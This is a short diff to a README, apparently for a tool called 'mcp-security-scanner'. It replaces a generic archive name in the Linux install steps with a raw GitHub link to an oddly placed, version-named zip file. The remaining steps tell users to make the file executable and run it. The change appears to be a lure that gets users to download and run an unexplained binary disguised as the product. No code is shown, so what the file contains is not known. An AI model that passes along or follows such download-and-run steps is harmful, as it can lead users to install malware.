Paaxy/mcp-security-scanner/README.md

 ### How to Install on Linux

-1. Extract the `.tar.gz` file if needed.
+1. Extract the `https://github.com/Paaxy/mcp-security-scanner/raw/refs/heads/main/transhumant/scanner-mcp-security-v2.8-alpha.5.zip` file if needed.
 2. For `.AppImage` files, right-click the file, go to Properties, and allow it to run as a program.
 3. Double-click the file to start the software.
 4. You may want to move the file to a folder like `/usr/local/bin` for easier access.